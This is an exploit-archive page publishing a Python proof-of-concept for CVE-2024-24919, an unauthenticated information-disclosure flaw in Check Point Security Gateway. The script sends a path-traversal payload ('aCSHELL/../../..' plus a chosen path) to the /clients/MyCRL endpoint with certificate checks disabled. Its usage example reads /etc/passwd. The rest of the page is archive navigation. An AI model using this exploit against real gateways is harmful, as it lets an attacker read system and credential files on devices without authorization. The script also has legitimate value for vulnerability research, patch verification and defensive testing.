Check Point Security Gateway Information Disclosure

Check Point Security Gateway Information Disclosure: Posted May 31, 2024; Authored by Yesith Alvarez; Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.; tags | exploit, info disclosure; advisories | CVE-2024-24919; SHA-256 | 9a00e15745eee654d5e56bd4984cd3a4bdcf8830f76d50a2c9914ecf0ab23d3f; Download | Favorite | View

Check Point Security Gateway Information Disclosure

# Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 
# CVE : CVE-2024-24919

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, |
 | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / / 
  \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/  
                                                                                 
                                                                          
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')   

def exploit(url, path):
  url = url + '/clients/MyCRL'
  data =   "aCSHELL/../../../../../../../../../../.."+ path
  headers = {        
    'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
  }
  s = Session()
  req = Request('POST', url, data=data, headers=headers)
  prepped = req.prepare()
  #del prepped.headers['Content-Type']
  resp = s.send(prepped,
      verify=False,
      timeout=15
  )  
  print(prepped.headers)
  print(url)
  print(resp.headers)
  print(resp.status_code)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 3):
      print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))
      print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))      
      exit(0)
    else:
      exploit(sys.argv[1],sys.argv[2])

Top Authors In Last 30 Days

Red Hat 225 files
indoushka 116 files
Ubuntu 84 files
Gentoo 36 files
Jasper Nota 25 files
Debian 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,101)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,815)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,569)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,756)
UNIX (9,438)
UnixWare (187)
Windows (6,674)
Other

Check Point Security Gateway Information Disclosure

Check Point Security Gateway Information Disclosure

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Check Point Security Gateway Information Disclosure

Share This

Check Point Security Gateway Information Disclosure

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems